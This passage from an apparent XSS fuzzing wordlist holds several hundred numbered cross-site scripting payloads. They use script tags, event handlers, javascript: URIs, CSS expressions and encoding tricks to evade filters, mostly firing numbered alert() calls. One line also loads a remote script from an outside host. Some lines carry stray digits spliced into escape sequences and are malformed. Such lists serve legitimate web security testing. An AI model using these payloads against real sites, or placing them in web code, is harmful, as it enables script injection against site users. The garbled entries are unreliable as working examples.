  1262. <a href="\x1384Cjavascript:javascript:alert(1384)" id="fuzzelement1384">test</a>
  1263. <a href="javascript\x00:javascript:alert(1385)" id="fuzzelement1385">test</a>
  1264. <a href="javascript\x3A:javascript:alert(1386)" id="fuzzelement1386">test</a>
  1265. <a href="javascript\x09:javascript:alert(1387)" id="fuzzelement1387">test</a>
  1266. <a href="javascript\x0D:javascript:alert(1388)" id="fuzzelement1388">test</a>
  1267. <a href="javascript\x0A:javascript:alert(1389)" id="fuzzelement1389">test</a>
  1268. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1390)>
  1269. `"'><img src=xxx:x \x22onerror=javascript:alert(1391)>
  1270. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1392)>
  1271. `"'><img src=xxx:x \x0Donerror=javascript:alert(1393)>
  1272. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1394)>
  1273. `"'><img src=xxx:x \x09onerror=javascript:alert(1395)>
  1274. `"'><img src=xxx:x \x0Conerror=javascript:alert(1396)>
  1275. `"'><img src=xxx:x \x00onerror=javascript:alert(1397)>
  1276. `"'><img src=xxx:x \x27onerror=javascript:alert(1398)>
  1277. `"'><img src=xxx:x \x20onerror=javascript:alert(1399)>
  1278. "`'><script>\x3Bjavascript:alert(1400)</script>
  1279. "`'><script>\x0Djavascript:alert(1401)</script>
  1280. "`'><script>\xEF\xBB\xBFjavascript:alert(1402)</script>
  1281. "`'><script>\xE2\x80\x81403javascript:alert(1403)</script>
  1282. "`'><script>\xE2\x80\x84javascript:alert(1404)</script>
  1283. "`'><script>\xE3\x80\x80javascript:alert(1405)</script>
  1284. "`'><script>\x09javascript:alert(1406)</script>
  1285. "`'><script>\xE2\x80\x89javascript:alert(1407)</script>
  1286. "`'><script>\xE2\x80\x85javascript:alert(1408)</script>
  1287. "`'><script>\xE2\x80\x88javascript:alert(1409)</script>
  1288. "`'><script>\x00javascript:alert(1410)</script>
  1289. "`'><script>\xE2\x80\xA8javascript:alert(1411)</script>
  1290. "`'><script>\xE2\x80\x8Ajavascript:alert(1412)</script>
  1291. "`'><script>\xE1413\x9A\x80javascript:alert(1413)</script>
  1292. "`'><script>\x0Cjavascript:alert(1414)</script>
  1293. "`'><script>\x2Bjavascript:alert(1415)</script>
  1294. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1416)</script>
  1295. "`'><script>-javascript:alert(1417)</script>
  1296. "`'><script>\x0Ajavascript:alert(1418)</script>
  1297. "`'><script>\xE2\x80\xAFjavascript:alert(1419)</script>
  1298. "`'><script>\x7Ejavascript:alert(1420)</script>
  1299. "`'><script>\xE2\x80\x87javascript:alert(1421)</script>
  1300. "`'><script>\xE2\x81422\x9Fjavascript:alert(1422)</script>
  1301. "`'><script>\xE2\x80\xA9javascript:alert(1423)</script>
  1302. "`'><script>\xC2\x85javascript:alert(1424)</script>
  1303. "`'><script>\xEF\xBF\xAEjavascript:alert(1425)</script>
  1304. "`'><script>\xE2\x80\x83javascript:alert(1426)</script>
  1305. "`'><script>\xE2\x80\x8Bjavascript:alert(1427)</script>
  1306. "`'><script>\xEF\xBF\xBEjavascript:alert(1428)</script>
  1307. "`'><script>\xE2\x80\x80javascript:alert(1429)</script>
  1308. "`'><script>\x21430javascript:alert(1430)</script>
  1309. "`'><script>\xE2\x80\x82javascript:alert(1431)</script>
  1310. "`'><script>\xE2\x80\x86javascript:alert(1432)</script>
  1311. "`'><script>\xE1433\xA0\x8Ejavascript:alert(1433)</script>
  1312. "`'><script>\x0Bjavascript:alert(1434)</script>
  1313. "`'><script>\x20javascript:alert(1435)</script>
  1314. "`'><script>\xC2\xA0javascript:alert(1436)</script>
  1315. "/><img/onerror=\x0Bjavascript:alert(1437)\x0Bsrc=xxx:x />
  1316. "/><img/onerror=\x22javascript:alert(1438)\x22src=xxx:x />
  1317. "/><img/onerror=\x09javascript:alert(1439)\x09src=xxx:x />
  1318. "/><img/onerror=\x27javascript:alert(1440)\x27src=xxx:x />
  1319. "/><img/onerror=\x0Ajavascript:alert(1441)\x0Asrc=xxx:x />
  1320. "/><img/onerror=\x0Cjavascript:alert(1442)\x0Csrc=xxx:x />
  1321. "/><img/onerror=\x0Djavascript:alert(1443)\x0Dsrc=xxx:x />
  1322. "/><img/onerror=\x60javascript:alert(1444)\x60src=xxx:x />
  1323. "/><img/onerror=\x20javascript:alert(1445)\x20src=xxx:x />
  1324. <script\x2F>javascript:alert(1446)</script>
  1325. <script\x20>javascript:alert(1447)</script>
  1326. <script\x0D>javascript:alert(1448)</script>
  1327. <script\x0A>javascript:alert(1449)</script>
  1328. <script\x0C>javascript:alert(1450)</script>
  1329. <script\x00>javascript:alert(1451)</script>
  1330. <script\x09>javascript:alert(1452)</script>
  1331. "><img src=x onerror=javascript:alert(1453)>
  1332. "><img src=x onerror=javascript:alert(1454)>
  1333. "><img src=x onerror=javascript:alert(1455)>
  1334. "><img src=x onerror=javascript:alert(1456)>
  1335. "><img src=x onerror=javascript:alert(1457))>
  1336. "><img src=x onerror=javascript:alert(1458))>
  1337. "><img src=x onerror=javascript:alert(1459))>
  1338. "><img src=x onerror=javascript:alert(1460)>
  1339. "><img src=x onerror=javascript:alert(1461))>
  1340. "><img src=x onerror=javascript:alert(1462))>
  1341. "><img src=x onerror=javascript:alert(1463)>
  1342. "><img src=x onerror=javascript:alert(1464))>
  1343. "><img src=x onerror=javascript:alert(1465)>
  1344. "><img src=x onerror=javascript:alert(1466))>
  1345. "><img src=x onerror=javascript:alert(1467)>
  1346. `"'><img src=xxx:x onerror\x0B=javascript:alert(1468)>
  1347. `"'><img src=xxx:x onerror\x00=javascript:alert(1469)>
  1348. `"'><img src=xxx:x onerror\x0C=javascript:alert(1470)>
  1349. `"'><img src=xxx:x onerror\x0D=javascript:alert(1471)>
  1350. `"'><img src=xxx:x onerror\x20=javascript:alert(1472)>
  1351. `"'><img src=xxx:x onerror\x0A=javascript:alert(1473)>
  1352. `"'><img src=xxx:x onerror\x09=javascript:alert(1474)>
  1353. <script>javascript:alert(1475)<\x00/script>
  1354. <img src=# onerror\x3D"javascript:alert(1476)" >
  1355. <input onfocus=javascript:alert(1477) autofocus>
  1356. <input onblur=javascript:alert(1478) autofocus><input autofocus>
  1357. <video poster=javascript:javascript:alert(1479)//
  1358. <body onscroll=javascript:alert(1480)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  1359. <form id=test onforminput=javascript:alert(1481)><input></form><button form=test onformchange=javascript:alert(1481)>X
  1360. <video><source onerror="javascript:javascript:alert(1482)">
  1361. <video onerror="javascript:javascript:alert(1483)"><source>
  1362. <form><button formaction="javascript:javascript:alert(1484)">X
  1363. <body oninput=javascript:alert(1485)><input autofocus>
  1364. <math href="javascript:javascript:alert(1486)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1486)">CLICKME</maction> </math>
  1365. <frameset onload=javascript:alert(1487)>
  1366. <table background="javascript:javascript:alert(1488)">
  1367. <!--<img src="--><img src=x onerror=javascript:alert(1489)//">
  1368. <comment><img src="</comment><img src=x onerror=javascript:alert(1490))//">
  1369. <![><img src="]><img src=x onerror=javascript:alert(1491)//">
  1370. <style><img src="</style><img src=x onerror=javascript:alert(1492)//">
  1371. <li style=list-style:url() onerror=javascript:alert(1493)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1493)></div>
  1372. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1494)//#">XXX</a></body>
  1373. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1495)</SCRIPT>
  1374. <OBJECT CLASSID="clsid:333C7BC4-460F-14961496D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1496)"></OBJECT>
  1375. <b <script>alert(1497)</script>0
  1376. <div id="div1498"><input value="``onmouseover=javascript:alert(1498)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1498").innerHTML;</script>
  1377. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1499)//'>
  1378. <embed src="javascript:alert(1500)">
  1379. <img src="javascript:alert(1501)">
  1380. <image src="javascript:alert(1502)">
  1381. <script src="javascript:alert(1503)">
  1382. <div style=width:1504px;filter:glow onfilterchange=javascript:alert(1504)>x
  1383. <? foo="><script>javascript:alert(1505)</script>">
  1384. <! foo="><script>javascript:alert(1506)</script>">
  1385. </ foo="><script>javascript:alert(1507)</script>">
  1386. <? foo="><x foo='?><script>javascript:alert(1508)</script>'>">
  1387. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1509)</script>">
  1388. <% foo><x foo="%><script>javascript:alert(1510)</script>">
  1389. <div id=d><x xmlns="><iframe onload=javascript:alert(1511)"></div> <script>d.innerHTML=d.innerHTML</script>
  1390. <img \x00src=x onerror="alert(1512)">
  1391. <img \x47src=x onerror="javascript:alert(1513)">
  1392. <img \x15141514src=x onerror="javascript:alert(1514)">
  1393. <img \x15152src=x onerror="javascript:alert(1515)">
  1394. <img\x47src=x onerror="javascript:alert(1516)">
  1395. <img\x15170src=x onerror="javascript:alert(1517)">
  1396. <img\x15183src=x onerror="javascript:alert(1518)">
  1397. <img\x32src=x onerror="javascript:alert(1519)">
  1398. <img\x47src=x onerror="javascript:alert(1520)">
  1399. <img\x15211521src=x onerror="javascript:alert(1521)">
  1400. <img \x47src=x onerror="javascript:alert(1522)">
  1401. <img \x34src=x onerror="javascript:alert(1523)">
  1402. <img \x39src=x onerror="javascript:alert(1524)">
  1403. <img \x00src=x onerror="javascript:alert(1525)">
  1404. <img src\x09=x onerror="javascript:alert(1526)">
  1405. <img src\x15270=x onerror="javascript:alert(1527)">
  1406. <img src\x15283=x onerror="javascript:alert(1528)">
  1407. <img src\x32=x onerror="javascript:alert(1529)">
  1408. <img src\x15302=x onerror="javascript:alert(1530)">
  1409. <img src\x15311531=x onerror="javascript:alert(1531)">
  1410. <img src\x00=x onerror="javascript:alert(1532)">
  1411. <img src\x47=x onerror="javascript:alert(1533)">
  1412. <img src=x\x09onerror="javascript:alert(1534)">
  1413. <img src=x\x15350onerror="javascript:alert(1535)">
  1414. <img src=x\x15361536onerror="javascript:alert(1536)">
  1415. <img src=x\x15372onerror="javascript:alert(1537)">
  1416. <img src=x\x15383onerror="javascript:alert(1538)">
  1417. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1539)">
  1418. <img src=x onerror=\x09"javascript:alert(1540)">
  1419. <img src=x onerror=\x15410"javascript:alert(1541)">
  1420. <img src=x onerror=\x15421542"javascript:alert(1542)">
  1421. <img src=x onerror=\x15432"javascript:alert(1543)">
  1422. <img src=x onerror=\x32"javascript:alert(1544)">
  1423. <img src=x onerror=\x00"javascript:alert(1545)">
  1424. <a href=java&#1546&#2&#3&#4&#5&#6&#7&#8&#15461546&#15462script:javascript:alert(1546)>XXX</a>
  1425. <img src="x` `<script>javascript:alert(1547)</script>"` `>
  1426. <img src onerror /" '"= alt=javascript:alert(1548)//">
  1427. <title onpropertychange=javascript:alert(1549)></title><title title=>
  1428. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1550)></a>">
  1429. <!--[if]><script>javascript:alert(1551)</script -->
  1430. <!--[if<img src=x onerror=javascript:alert(1552)//]> -->
  1431. <object id="x" classid="clsid:CB927D15532-4FF7-4a9e-A155369-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C15537-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1553)" style="behavior:url(#x);"><param name=postdomevents /></object>
  1432. <a style="-o-link:'javascript:javascript:alert(1554)';-o-link-source:current">X
  1433. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1555)'}{}*{-o-link-source:current}]{color:red};</style>
  1434. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1556))%7d
  1435. <style>@import "data:,*%7bx:expression(javascript:alert(1557))%7D";</style>
  1436. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1558);">XXX</a></a><a href="javascript:javascript:alert(1558)">XXX</a>
  1437. <// style=x:expression\28javascript:alert(1559)\29>
  1438. <style>*{x:expression(javascript:alert(1560))}</style>
  1439. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1561));">X
  1440. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1562)}}).$=eval</script>
  1441. <script>({0:#0=eval/#0#/#0#(javascript:alert(1563))})</script>
  1442. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1564)}),x</script>
  1443. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1565)')()</script>
  1444. <meta charset="mac-farsi">¼script¾javascript:alert(1566)¼/script¾
  1445. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1567)` >
  1446. 1568<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41568vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1568)&gt;`>
  1447. 1569<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1569)&gt;>
  1448. 1570<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1570) strokecolor=white strokeweight=1570000px from=0 to=1570000 /></a>
  1449. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1571)">XXX</a>
  1450. <event-source src="%(event)s" onload="javascript:alert(1572)">
  1451. <a href="javascript:javascript:alert(1573)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  1452. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#15741574;src=x:x&#15741574;onerror&#15741574;=javascript:alert(1574)&gt;">
  1453. <script>javascript:alert(1575)</script>
  1454. <IMG SRC="javascript:javascript:alert(1576);">
  1455. <IMG SRC=javascript:javascript:alert(1577)>
  1456. <IMG SRC=`javascript:javascript:alert(1578)`>
  1457. <FRAMESET><FRAME SRC="javascript:javascript:alert(1579);"></FRAMESET>
  1458. <BODY ONLOAD=javascript:alert(1580)>
  1459. <BODY ONLOAD=javascript:javascript:alert(1581)>
  1460. <IMG SRC="jav ascript:javascript:alert(1582);">
  1461. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1583)>
  1462. <IMG SRC="javascript:javascript:alert(1584)"
  1463. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1585);">
  1464. <IMG DYNSRC="javascript:javascript:alert(1586)">
  1465. <IMG LOWSRC="javascript:javascript:alert(1587)">
  1466. <BGSOUND SRC="javascript:javascript:alert(1588);">
  1467. <BR SIZE="&{javascript:alert(1589)}">
  1468. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1590);">
  1469. <STYLE>li {list-style-image: url("javascript:javascript:alert(1591)");}</STYLE><UL><LI>XSS
  1470. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1592);">
  1471. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1593);">
  1472. <IFRAME SRC="javascript:javascript:alert(1594);"></IFRAME>
  1473. <TABLE BACKGROUND="javascript:javascript:alert(1595)">
  1474. <TABLE><TD BACKGROUND="javascript:javascript:alert(1596)">
  1475. <DIV STYLE="background-image: url(javascript:javascript:alert(1597))">
  1476. <DIV STYLE="width:expression(javascript:alert(1598));">
  1477. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1599))">
  1478. <XSS STYLE="xss:expression(javascript:alert(1600))">
  1479. <STYLE TYPE="text/javascript">javascript:alert(1601);</STYLE>
  1480. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1602)");}</STYLE><A CLASS=XSS></A>
  1481. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1603)")}</STYLE>
  1482. <!--[if gte IE 4]><SCRIPT>javascript:alert(1604);</SCRIPT><![endif]-->
  1483. <BASE HREF="javascript:javascript:alert(1605);//">
  1484. <OBJECT classid=clsid:ae24fdae-03c6-16061606d1606-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1606)></OBJECT>
  1485. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1607)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  1486. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1608)&lt;/SCRIPT&gt;"></BODY></HTML>
  1487. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1609)">X
  1488. <body onscroll=javascript:alert(1610)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1489. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1611)">
  1490. <STYLE>a{background:url('s1612' 's2)}@import javascript:javascript:alert(1612);');}</STYLE>
  1491. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1613)&&;&&<&&/script&&>
  1492. <SCRIPT onreadystatechange=javascript:javascript:alert(1614);></SCRIPT>
  1493. <style onreadystatechange=javascript:javascript:alert(1615);></style>
  1494. <?xml version="1616.0"?><html:html xmlns:html='http://www.w3.org/1616999/xhtml'><html:script>javascript:alert(1616);</html:script></html:html>
  1495. <embed code=javascript:javascript:alert(1617);></embed>
  1496. <frameset onload=javascript:javascript:alert(1618)></frameset>
  1497. <object onerror=javascript:javascript:alert(1619)>
  1498. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1620);">]]</C><X></xml>
  1499. <IMG SRC=&{javascript:alert(1621);};>
  1500. <a href="jav&#65ascript:javascript:alert(1622)">test1622</a>
  1501. <a href="jav&#97ascript:javascript:alert(1623)">test1623</a>
  1502. <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1624)&amp;gt;>">
  1503. ';alert(1625))//';alert(1625))//";
  1504. alert(1626))//";alert(1626))//--
  1505. ></SCRIPT>">'><SCRIPT>alert(1627))</SCRIPT>
  1506. <IMG SRC="javascript:alert(1628);">
  1507. <IMG SRC=javascript:alert(1629)>
  1508. <IMG SRC=JaVaScRiPt:alert(1630)>
  1509. <IMG SRC=javascript:alert(1631)>
  1510. <IMG SRC=`javascript:alert(1632)`>
  1511. <a onmouseover="alert(1633)">xxs link</a>
  1512. <a onmouseover=alert(1634)>xxs link</a>
  1513. <IMG """><SCRIPT>alert(1635)</SCRIPT>">
  1514. <IMG SRC=javascript:alert(1636))>
  1515. <IMG SRC=# onmouseover="alert(1637)">
  1516. <IMG SRC= onmouseover="alert(1638)">
  1517. <IMG onmouseover="alert(1639)">
  1518. <IMG SRC="jav ascript:alert(1640);">
  1519. <IMG SRC="jav&#x09;ascript:alert(1641);">
  1520. <IMG SRC="jav&#x0A;ascript:alert(1642);">
  1521. <IMG SRC="jav&#x0D;ascript:alert(1643);">
  1522. perl -e 'print "<IMG SRC=java\0script:alert(1644)>";' > out
  1523. <IMG SRC=" &#14; javascript:alert(1645);">
  1524. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1646)>
  1525. <<SCRIPT>alert(1647);//<</SCRIPT>
  1526. <IMG SRC="javascript:alert(1648)"
  1527. \";alert(1649);//
  1528. </TITLE><SCRIPT>alert(1650);</SCRIPT>
  1529. <INPUT TYPE="IMAGE" SRC="javascript:alert(1651);">
  1530. <BODY BACKGROUND="javascript:alert(1652)">
  1531. <IMG DYNSRC="javascript:alert(1653)">
  1532. <IMG LOWSRC="javascript:alert(1654)">
  1533. <STYLE>li {list-style-image: url("javascript:alert(1655)");}</STYLE><UL><LI>XSS</br>
  1534. <BODY ONLOAD=alert(1656)>
  1535. <BGSOUND SRC="javascript:alert(1657);">
  1536. <BR SIZE="&{alert(1658)}">
  1537. <LINK REL="stylesheet" HREF="javascript:alert(1659);">
  1538. <STYLE>@im\port'\ja\vasc\ript:alert(1660)';</STYLE>
  1539. <IMG STYLE="xss:expr/*XSS*/ession(alert(1661))">
  1540. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1662))'>
  1541. <STYLE TYPE="text/javascript">alert(1663);</STYLE>
  1542. <STYLE>.XSS{background-image:url("javascript:alert(1664)");}</STYLE><A CLASS=XSS></A>
  1543. <STYLE type="text/css">BODY{background:url("javascript:alert(1665)")}</STYLE>
  1544. <STYLE type="text/css">BODY{background:url("javascript:alert(1666)")}</STYLE>
  1545. <XSS STYLE="xss:expression(alert(1667))">
  1546. ¼script¾alert(1668)¼/script¾
  1547. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1669);">
  1548. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1670);">
  1549. <IFRAME SRC="javascript:alert(1671);"></IFRAME>
  1550. <IFRAME SRC=# onmouseover="alert(1672)"></IFRAME>
  1551. <FRAMESET><FRAME SRC="javascript:alert(1673);"></FRAMESET>
  1552. <TABLE BACKGROUND="javascript:alert(1674)">
  1553. <TABLE><TD BACKGROUND="javascript:alert(1675)">
  1554. <DIV STYLE="background-image: url(javascript:alert(1676))">
  1555. <DIV STYLE="background-image: url(&#1;javascript:alert(1677))">
  1556. <DIV STYLE="width: expression(alert(1678));">
  1557. <BASE HREF="javascript:alert(1679);//">
  1558. <? echo('<SCR)';echo('IPT>alert(1680)</SCRIPT>'); ?>
  1559. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1681)</SCRIPT>">
  1560. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1682);+ADw-/SCRIPT+AD4-
  1561. <img src=``&NewLine; onerror=alert(1683)&NewLine;
  1562. <script /**/>/**/alert(1684)/**/</script /**/
  1563. <iframe/src="data:text/html,<svg &#168516851685;&#168516850;load=alert(1685)>">
  1564. <meta content="&NewLine; 1686 &NewLine;; JAVASCRIPT&colon; alert(1686)" http-equiv="refresh"/>
  1565. <form><iframe &#09;&#16870;&#16871687; src="javascript&#58;alert(1687)"&#16871687;&#16870;&#09;;>
  1566. http://www.google<script .com>alert(1688)</script
  1567. <script ^__^>alert(1689))</script ^__^
  1568. </style &#32;><script &#32; :-(>/**/alert(1690)/**/</script &#32; :-(
  1569. &#00;</form><input type&#61691;"date" onfocus="alert(1691)">
  1570. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1692)&NewLine;>X</a>
  1571. <script ~~~>alert(1693)</script ~~~>
  1572. <iframe// src=javaSCRIPT&colon;alert(1694)
  1573. <%<!--'%><script>alert(1695);</script -->
  1574. <script src="data:text/javascript,alert(1696)"></script>
  1575. <iframe/onreadystatechange=alert(1697)
  1576. <svg/onload=alert(1698)
  1577. <input type="text" value=`` <div/onmouseover='alert(1699)'>X</div>
  1578. <img src=`xx:xx`onerror=alert(1700)>
  1579. <meta http-equiv="refresh" content="0;javascript&colon;alert(1701)"/>
  1580. <script>+-+-1702-+-+alert(1702)</script>
  1581. <body/onload=&lt;!--&gt;&#17030alert(1703)>
  1582. <script itworksinallbrowsers>/*<script* */alert(1704)</script
  1583. <img src ?itworksonchrome?\/onerror = alert(1705)
  1584. <svg><script onlypossibleinopera:-)> alert(1706)
  1585. <script x> alert(1707) </script 1707=2
  1586. <div/onmouseover='alert(1708)'> style="x:">
  1587. <--`<img/src=` onerror=alert(1709)> --!>
  1588. <div style="position:absolute;top:0;left:0;width:171000%;height:171000%" onmouseover="prompt(1710)" onclick="alert(1710)">x</button>
  1589. <form><button formaction=javascript&colon;alert(1711)>CLICKME
  1590. <script>alert(1712);</script>
  1591. <script>alert(1713);</script>
  1592. <IMG SRC="javascript:alert(1714);">
  1593. <IMG SRC=javascript:alert(1715)>
  1594. <IMG SRC=javascript:alert(1716)>
  1595. <IMG SRC=javascript:alert(1717)>
  1596. <IMG """><SCRIPT>alert(1718)</SCRIPT>">
  1597. <scr<script>ipt>alert(1719);</scr</script>ipt>
  1598. <script>alert(1720))</script>
  1599. <img src=foo.png onerror=alert(1721) />
  1600. <style>@im\port'\ja\vasc\ript:alert(1722)';</style>
  1601. <? echo('<scr)'; echo('ipt>alert(1723)</script>'); ?>
  1602. <marquee><script>alert(1724)</script></marquee>
  1603. <IMG SRC=\"jav&#x09;ascript:alert(1725);\">
  1604. <IMG SRC=\"jav&#x0A;ascript:alert(1726);\">
  1605. <IMG SRC=\"jav&#x0D;ascript:alert(1727);\">
  1606. <IMG SRC=javascript:alert(1728))>
  1607. "><script>alert(1729)</script>
  1608. </title><script>alert(1730)</script>
  1609. </textarea><script>alert(1731)</script>
  1610. <IMG LOWSRC=\"javascript:alert(1732)\">
  1611. <IMG DYNSRC=\"javascript:alert(1733)\">
  1612. <font style='color:expression(alert(1734))'>
  1613. <img src="javascript:alert(1735)">
  1614. <script language="JavaScript">alert(1736)</script>
  1615. <body onunload="javascript:alert(1737);">
  1616. <body onLoad="alert(1738);"
  1617. [color=red' onmouseover="alert(1739)"]mouse over[/color]
  1618. "/></a></><img src=1740.gif onerror=alert(1740)>
  1619. window.alert(1741);
  1620. alert(1742));'))">
  1621. <iframe<?php echo chr(11)?> onload=alert(1743)></iframe>
  1622. "><script alert(1744))</script>
  1623. '">><script>alert(1745)</script>
  1624. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1746);\">
  1625. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(1747);\">
  1626. <script>1748 1748 = 1; alert(1748)</script>
  1627. <STYLE type="text/css">BODY{background:url("javascript:alert(1749)")}</STYLE>
  1628. <?='<SCRIPT>alert(1750)</SCRIPT>'?>
  1629. " onfocus=alert(1751) "> <"
  1630. <FRAMESET><FRAME SRC=\"javascript:alert(1752);\"></FRAMESET>
  1631. <STYLE>li {list-style-image: url(\"javascript:alert(1753)\");}</STYLE><UL><LI>XSS
  1632. perl -e 'print \"<SCR\0IPT>alert(1754)</SCR\0IPT>\";' > out
  1633. perl -e 'print \"<IMG SRC=java\0script:alert(1755)>\";' > out
  1634. <br size=\"&{alert(1756)}\">
  1635. <scrscriptipt>alert(1757)</scrscriptipt>
  1636. </script><script>alert(1759)</script>
  1637. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1760)>
  1638. [color=red width=expression(alert(1761))][color]
  1639. <BASE HREF="javascript:alert(1762);//">
  1640. "></iframe><script>alert(1763)</script>
  1641. <body onLoad="while(true) alert(1764);">
  1642. '"></title><script>alert(1765)</script>
  1643. </textarea>'"><script>alert(1766)</script>
  1644. '""><script language="JavaScript"> alert(1767);</script>
  1645. </script></script><<<<script><>>>><<<script>alert(1768)</script>
  1646. <INPUT TYPE="IMAGE" SRC="javascript:alert(1769);">
  1647. '></select><script>alert(1770)</script>
  1648. a="get";b="URL";c="javascript:";d="alert(1771);";eval(a+b+c+d);
  1649. ='><script>alert(1772)</script>
  1650. <body background=javascript:'"><script>alert(1773)</script>></body>
  1651. ">/XaDoS/><script>alert(1774)</script><script src="http://www.site.com/XSS.js"></script>
  1652. ">/KinG-InFeT.NeT/><script>alert(1775)</script>
  1653. !--" /><script>alert(1776);</script>
  1654. <script>alert(1777)</script><marquee><h1>XSS by xss</h1></marquee>
  1655. "><script>alert(1778)</script>><marquee><h1>XSS by xss</h1></marquee>
  1656. '"></title><script>alert(1779)</script>><marquee><h1>XSS by xss</h1></marquee>
  1657. <img """><script>alert(1780)</script><marquee><h1>XSS by xss</h1></marquee>
  1658. <script>alert(1781)</script><marquee><h1>XSS by xss</h1></marquee>
  1659. "><script>alert(1782)</script>"><script>alert("XSS by \nxss</h1></marquee>
  1660. '"></title><script>alert(1783)</script>><marquee><h1>XSS by xss</h1></marquee>
  1661. <iframe src="javascript:alert(1784);"></iframe><marquee><h1>XSS by xss</h1></marquee>
  1662. '><SCRIPT>alert(1785))</SCRIPT><img src="" alt='
  1663. "><SCRIPT>alert(1786))</SCRIPT><img src="" alt="
  1664. \'><SCRIPT>alert(1787))</SCRIPT><img src="" alt=\'
  1665. '); alert(1788); var x='
  1666. \\'); alert(1789);var x=\'
  1667. //--></SCRIPT><SCRIPT>alert(1790));
  1668. >"><ScRiPt%20%0a%0d>alert(1791)%3B</ScRiPt>
  1669. <SCRIPT> alert(1792); </SCRIPT>
  1670. <BODY ONLOAD=alert(1793)>
  1671. <BODY BACKGROUND="javascript:alert(1794)">
  1672. <IMG SRC="javascript:alert(1795);">
  1673. <IMG DYNSRC="javascript:alert(1796)">
  1674. <IMG LOWSRC="javascript:alert(1797)">
  1675. <INPUT TYPE="IMAGE" SRC="javascript:alert(1798);">
  1676. <LINK REL="stylesheet" HREF="javascript:alert(1799);">
  1677. <TABLE BACKGROUND="javascript:alert(1800)">
  1678. <TD BACKGROUND="javascript:alert(1801)">
  1679. <DIV STYLE="background-image: url(javascript:alert(1802))">
  1680. <DIV STYLE="width: expression(alert(1803));">
